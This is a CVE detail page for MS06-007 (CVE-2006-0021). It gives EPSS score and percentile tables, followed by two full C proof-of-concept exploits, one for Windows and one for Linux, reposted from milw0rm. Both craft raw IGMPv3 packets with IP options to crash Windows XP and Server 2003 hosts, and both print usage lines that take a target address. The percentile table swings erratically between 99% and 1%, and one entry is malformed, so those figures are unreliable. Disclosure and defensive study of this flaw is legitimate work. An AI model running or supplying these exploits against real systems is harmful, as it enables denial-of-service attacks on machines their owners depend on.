CVE-2006-0021 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	51.48%	–	–
2022-04-03	–	–	51.48%	–	–
2023-03-12	–	–	–	96.71%	–
2023-04-16	–	–	–	96.72%	–
2023-05-21	–	–	–	96.69%	–
2023-07-16	–	–	–	96.62%	–
2023-08-27	–	–	–	96.68%	–
2023-09-24	–	–	–	96.68%	–
2023-10-22	–	–	–	96.62%	–
2023-11-05	–	–	–	96.62%	–
2024-01-07	–	–	–	96.52%	–
2024-06-02	–	–	–	96.52%	–
2024-06-09	–	–	–	94.68%	–
2024-12-22	–	–	–	66.5%	–
2025-01-26	–	–	–	79.56%	–
2025-01-19	–	–	–	66.5%	–
2025-01-25	–	–	–	79.56%	–
2025-03-18	–	–	–	–	64.3%
2025-03-30	–	–	–	–	65.82%
2025-03-30	–	–	–	–	65.82,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	98%
2022-04-03	99%
2023-03-12	99%
2023-04-16	99%
2023-05-21	99%
2023-07-16	99%
2023-08-27	99%
2023-09-24	1%
2023-10-22	99%
2023-11-05	1%
2024-01-07	1%
2024-06-02	1%
2024-06-09	99%
2024-12-22	98%
2025-01-26	99%
2025-01-19	98%
2025-01-25	99%
2025-03-18	98%
2025-03-30	98%
2025-03-30	98%

/* IGMP v3 DoS Exploit ref: http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html ref: http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx by Alexey Sintsov (dookie@inbox.ru) Req: Administrator rights on system Windows Firewall off (for sending RAW packets) Affected Products: Microsoft Corporation Windows XP All Microsoft Corporation Windows Server 2003 All */ #include <stdio.h> #include <winsock2.h> #pragma comment(lib, "Ws2_32.lib") typedef struct iphdr { unsigned char verlen; // IP version & length unsigned char tos; // Type of service unsigned short total_len; // Total length of the packet unsigned short ident; // Unique identifier unsigned short frag_and_flags; // Flags unsigned char ttl; // Time to live unsigned char proto; // Protocol (TCP, UDP etc) unsigned short checksum; // IP checksum unsigned int sourceIP; // Source IP unsigned int destIP; // Destination IP unsigned short options[2]; } IPHEADER; typedef struct igmphdr { unsigned char type; unsigned char code; unsigned short checksum; unsigned long group; unsigned char ResvSQVR; unsigned char QQIC; unsigned short num; unsigned long addes; } IGMPHEADER; USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while (size > 1) { cksum += *buffer++; size -= sizeof(USHORT); } if (size) cksum += *(UCHAR*)buffer; cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } int sendIGMP(char* a, char* b) { unsigned int dst_addr, src_addr; IPHEADER ipHeader; IGMPHEADER igmpHeader; dst_addr=inet_addr (b); src_addr=inet_addr (a); char szSendBuf[60]={0}; int rect; WSADATA WSAData; if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0) return FALSE; SOCKET sock; if ((sock = WSASocket(AF_INET,SOCK_RAW, IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) { printf("Create socket error"); WSACleanup(); return FALSE; } BOOL flag=TRUE; if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) { printf("Set options error"); closesocket(sock); WSACleanup(); return FALSE; } SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family=AF_INET; ssin.sin_port=htons(99); ssin.sin_addr.s_addr=dst_addr; ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader)); ipHeader.ident=htons(0); ipHeader.frag_and_flags=0; ipHeader.ttl=128; ipHeader.proto=IPPROTO_IGMP; ipHeader.checksum=0; ipHeader.tos=0; ipHeader.destIP=dst_addr; ipHeader.sourceIP=src_addr; //Ip options ipHeader.options[0]=htons(0x0000); //bug is here =) ipHeader.options[1]=htons(0x0000); igmpHeader.type=0x11; //v3 Membership Query igmpHeader.code=5; igmpHeader.num=htons(1); igmpHeader.ResvSQVR=0x0; igmpHeader.QQIC=0; igmpHeader.group=inet_addr("0.0.0.0"); igmpHeader.addes=dst_addr; igmpHeader.checksum=0; memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader)); igmpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(igmpHeader)); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader, sizeof(igmpHeader)); memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4); ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader))); memcpy(szSendBuf, &ipHeader, sizeof(ipHeader)); rect=sendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin)); if (rect==SOCKET_ERROR) { printf("Send error: <%d>\n",WSAGetLastError()); closesocket(sock); WSACleanup(); return 0; } closesocket(sock); WSACleanup(); return 1; } main(int argc, char **argv) { if(argc<2) { printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey Sintsov(dookie@inbox.ru)\n\n"); printf("Usage:\n"); printf("c:\\igmps.exe <target ip> <source ip>\n\n"); exit(0); } sendIGMP(argv[2], argv[1]); return 0; } // milw0rm.com [2006-03-21]

/* MS06-007 Denial of Service POC exploit created by Firestorm, based on zloSend.exe win32 exploit (http://www.securitylab.ru/poc/264136.php) Tested on Windows XP SP2 as victim (compiled/runned on Fedore Core 4 x86) FOR EDUCATIONAL PURPOSE ONLY !!! */ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <unistd.h> struct iphdr { unsigned char ihl:4, version:4, tos; unsigned short tot_len, id, frag_off; unsigned char ttl, protocol; unsigned short check; unsigned int saddr, daddr; unsigned int options1; unsigned int options2; }; struct igmpv3_query { unsigned char type; unsigned char code; unsigned short csum; unsigned int group; unsigned char qqic; unsigned char qrv:3, suppress:1, resv:4; unsigned short nsrcs; unsigned int srcs[1]; }; unsigned short in_chksum(unsigned short *, int); long resolve(char *); long resolve(char *host) { struct hostent *hst; long addr; hst = gethostbyname(host); if (hst == NULL) return(-1); memcpy(&addr, hst->h_addr, hst->h_length); return(addr); } int main(int argc, char *argv[]) { struct sockaddr_in dst; struct iphdr *ip; struct igmpv3_query *igmp; long daddr, saddr; int s, i=0, c, len, one=1; char buf[1500]; if (argc < 3) { printf("MS06-007 Denial of Service POC exploit by Firestorm\n"); printf("Usage: %s <src> <dst>\n", *argv); return(1); } daddr = resolve(argv[2]); saddr = resolve(argv[1]); memset(buf, 0, 1500); ip = (struct iphdr *)&buf; igmp = (struct igmpv3_query*)&buf[sizeof(struct iphdr)]; dst.sin_addr.s_addr = daddr; dst.sin_family = AF_INET; ip->ihl = 7; ip->version = 4; ip->tos = 0; ip->tot_len = htons(44); ip->id = htons(18277); ip->frag_off=0; ip->ttl = 128; ip->protocol = IPPROTO_IGMP; ip->check = in_chksum((unsigned short *)ip, sizeof(struct iphdr)); ip->saddr = saddr; ip->daddr = daddr; ip->options1 = 0; ip->options2 = 0; igmp->type = 0x11; igmp->code = 5; igmp->group=inet_addr("224.0.0.1"); igmp->qqic=0; igmp->qrv=0; igmp->suppress=0; igmp->resv=0; igmp->nsrcs=htons(1); igmp->srcs[0]=daddr; igmp->csum = 0; //For computing the checksum, the Checksum field is set to zero. igmp->csum=in_chksum((unsigned short *)igmp, sizeof(struct igmpv3_query)); s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (s == -1) return(1); printf("Sending IGMP packet: %s -> %s\n", argv[1], argv[2]); if (sendto(s,&buf,44,0,(struct sockaddr *)&dst,sizeof(struct sockaddr_in)) == -1) { perror("Error sending packet"); exit(-1); } return(0); } unsigned short in_chksum(unsigned short *addr, int len) { register int nleft = len; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *addr++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)addr; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } // milw0rm.com [2006-03-22]